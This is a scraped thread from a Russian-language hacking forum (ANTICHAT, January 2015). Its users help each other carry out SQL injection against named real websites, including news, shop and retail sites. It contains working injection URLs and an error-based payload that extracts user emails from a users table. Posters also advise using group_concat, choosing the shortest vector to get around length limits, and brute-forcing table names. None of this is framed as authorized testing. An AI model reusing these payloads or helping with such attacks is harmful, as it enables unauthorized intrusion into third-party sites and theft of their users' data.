ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.01.2015, 19:31
|
|
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077
Репутация:
438
|
|
Сообщение от faza02
faza02 said:
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
Сообщение от Cennarios
Cennarios said:
Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
|
|
|
02.01.2015, 16:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Код:
Code:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
Там parameter length constraint mechanism. Как обойти для вывода? |
|
|
|
02.01.2015, 16:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
Код:
Code:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
Там parameter length constraint mechanism. Как обойти для вывода? чтобы не мучаться с этим, есть еще post sqli в форме входа
http://hollywoodnewswire.net/scripts/login.php
Сообщение от x_Lex
x_Lex said:
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
тогда вспоминайте, мне данные способы неизвестны.
|
|
|
|
02.01.2015, 17:21
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от x_Lex
x_Lex said:
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
Брут!
|
|
|
|
02.01.2015, 18:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
чтобы не мучаться с этим, есть еще post sqli в форме входа
http://hollywoodnewswire.net/scripts/login.php
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
|
|
|
|
03.01.2015, 13:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
69527
Репутация:
5
|
|
Есть запрос "
Код:
Code:
/ru/users/?brands%5B%5D=9+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cusers.email%2C0x27%2C0x7e%29+from+%60dbname%60.users+Order+by+id+limit+4%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
выводит:
Код:
Code:
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row' in /
куда копать? |
|
|
|
03.01.2015, 14:29
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от sysjuk
sysjuk said:
куда копать?
group_concat(users.email)
Сообщение от vikler
vikler said:
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
error-based. однако, там тоже запрос режется, нужно узнать версию и выбрать самый короткий вектор
https://rdot.org/forum/showthread.php?t=325
например:
Код:
Code:
XPATH syntax error: '.73-log5.1.73-log'
|
|
|
|
03.01.2015, 21:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Так какой же вектор применим к этому случаю?
Код:
Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html
Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка? |
|
|
|
03.01.2015, 21:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'
не получается найти нужное направление, error based не помогает, что то можно придумать?
Код HTML:
HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
не выдает ошибки |
|
|
|
03.01.2015, 22:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от Br@!ns
Br@!ns said:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'
не получается найти нужное направление, error based не помогает, что то можно придумать?
Код HTML:
HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
не выдает ошибки этож Magento, а какой скуле может быть речь?
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
